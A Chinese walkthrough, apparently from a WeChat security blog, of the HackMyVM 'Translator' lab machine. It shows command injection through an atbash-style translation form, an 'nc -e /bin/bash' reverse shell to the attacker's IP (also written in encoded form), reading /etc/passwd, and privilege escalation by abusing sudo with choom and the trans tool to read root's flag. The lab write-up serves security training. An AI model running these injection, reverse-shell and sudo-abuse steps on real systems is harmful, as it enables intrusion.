靶机信息
下载地址:
https://hackmyvm.eu/machines/machine.php?vm=Translator
网盘链接:https://pan.baidu.com/s/1OjMwuU6F1V98x2UnLz-eHA?pwd=xcvx
靶场: HackMyVm.eu
靶机名称: Translator
难度: 简单
发布时间: 2022年5月12日
提示信息:
无
目标: user.txt和root.txt
实验环境
攻击机:VMware kali 10.0.0.3 eth0桥接互联网,eth1桥接vbox-Host-Only
靶机:Vbox linux IP自动获取 网卡host-Only
信息收集
扫描主机
扫描局域网内的靶机IP地址
fping -ag 10.0.0.0/24 2>/dev/null
扫描到主机地址为10.0.0.147
扫描端口
扫描靶机开放的服务端口
for i in {1..500} ; do (nc -nv 10.0.0.167 $i -w1 2>&1 </dev/null |grep open) ; done
sudo nmap -sC -sV -p22,80 10.0.0.167 -oN nmap.log
扫描到22和80端口开放,先来看看80端口
Web渗透
访问后出现一个文本提交功能,经过简单的测试,翻译后会将输入的字符转换双倍输出
例如输入aaa输出zzz zzz;输入bbb输出yyy yyy
经过多次尝试发现使用分号可以执行命令,命令需要转换为字符,例如执行id命令
;rw
现在反弹shell到攻击机
1。转换反弹shell字符串
nc -e /bin/bash 10.0.0.3 4444
2。攻击机监听4444端口
nc -lvvp 4444
3。发送payload
mx -v /yrm/yzhs 10.0.0.3 4444
反弹成功,切换到交互式shell
python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
Ctrl+z快捷键
stty raw -echo;fg
reset
切换完成,来找找敏感信息
ls -al
cat hvxivg
html目录下发现hvxivg文件,内容是一串奇怪的字符串,用web上的字符串转一下
发现一个密码,看看有哪些用户
cat /etc/passwd |grep bash
发现2个用户,用密码登录SSH试试
ssh [email protected]
登录成功,继续找敏感信息
ls -al
cat user.txt
sudo -l
发现可以使用india用户身份执行/usr/bin/choom命令,来看看这个命令是做什么的
man choom
发现-n后面可以执行命令,来验证一下
sudo -u india /usr/bin/choom -n 1 /bin/bash
提权成功,继续提权
sudo -l
发现可以使用root身份执行trans命令,再来看看这个命令
sudo /usr/local/bin/trans -h
这个一个google的shell下翻译工具,经过多次尝试使用-i可以读取文件,但是连接google需要科学上网,所以我在后面加上了-x代理
sudo /usr/local/bin/trans -i /root/root.txt -x http://192.168.7.2:7890 -no-auto
拿到root.txt,游戏结束
原文始发于微信公众号(伏波路上学安全):渗透测试靶机练习No.93 Translator
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论